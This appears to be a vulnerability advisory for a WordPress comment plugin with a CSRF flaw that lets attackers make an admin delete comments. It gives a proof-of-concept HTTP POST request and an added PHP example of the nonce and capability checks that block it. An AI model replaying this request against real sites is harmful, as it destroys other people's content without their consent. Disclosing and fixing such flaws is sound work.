wpexploit | Wpvulndb | WPEX-ID:01483284-57F5-4AE9-B5F1-AE26B623571F
History: Aug 23, 2021 - 12:00 a.m.

Comment Link Remove and Other Comment Tools < 2.1.6 - Arbitrary Comment Deletion via CSRF

2021-08-23 00:00:00
wpvulndb
395

EPSS: 0.001 (Low), percentile 30.2%

The plugin does not have a CSRF check in its ‘Delete comments easily’ feature, which could allow attackers to make a logged-in admin delete arbitrary comments.

POST /wp-admin/admin.php?page=comment-link-remove HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Connection: keep-alive
Cookie: [admin+ cookies]
Upgrade-Insecure-Requests: 1

delAllCmts=delAllCmts
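
The request above succeeds because nothing in it is tied to a form the admin actually loaded. As an added example (not the plugin's own code and not its 2.1.6 patch), this is the usual WordPress pattern for the missing check: a nonce in the form, then a capability check and nonce verification before any deletion. Only the `comment-link-remove` page slug and the `delAllCmts` field come from the advisory; every `clr_example_` name, the nonce field name and the deletion loop are assumptions.

```php
<?php
// Added example. Names prefixed clr_example_ are hypothetical; only the page
// slug and the delAllCmts field are taken from the advisory.
const CLR_EXAMPLE_ACTION = 'clr_example_delete_all_comments';
const CLR_EXAMPLE_FIELD  = '_clr_example_nonce';

// Render the form with a nonce bound to the current user, session and action.
function clr_example_render_delete_form() {
    $target = admin_url( 'admin.php?page=comment-link-remove' );
    ?>
    <form method="post" action="<?php echo esc_url( $target ); ?>">
        <?php wp_nonce_field( CLR_EXAMPLE_ACTION, CLR_EXAMPLE_FIELD ); ?>
        <input type="submit" name="delAllCmts" value="delAllCmts" />
    </form>
    <?php
}

// Handle the submission. A cross-site POST carries the admin's cookies but
// cannot know the nonce, so it stops at check_admin_referer().
function clr_example_handle_delete() {
    $method = isset( $_SERVER['REQUEST_METHOD'] ) ? $_SERVER['REQUEST_METHOD'] : '';
    if ( 'POST' !== $method || ! isset( $_POST['delAllCmts'] ) ) {
        return; // Not this form's submission.
    }

    // Authorisation: a valid session is not the same as permission.
    if ( ! current_user_can( 'moderate_comments' ) ) {
        wp_die( 'You are not allowed to delete comments.', '', array( 'response' => 403 ) );
    }

    // CSRF check: ends the request with a 403 if the nonce is missing or invalid.
    check_admin_referer( CLR_EXAMPLE_ACTION, CLR_EXAMPLE_FIELD );

    // Assumed behaviour: permanently delete every comment get_comments() returns.
    $ids = get_comments( array( 'fields' => 'ids', 'status' => 'all' ) );
    foreach ( $ids as $id ) {
        wp_delete_comment( (int) $id, true );
    }
}
add_action( 'admin_init', 'clr_example_handle_delete' );
```

With this in place, replaying the request above with only `delAllCmts=delAllCmts` in the body is rejected before the deletion loop runs.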
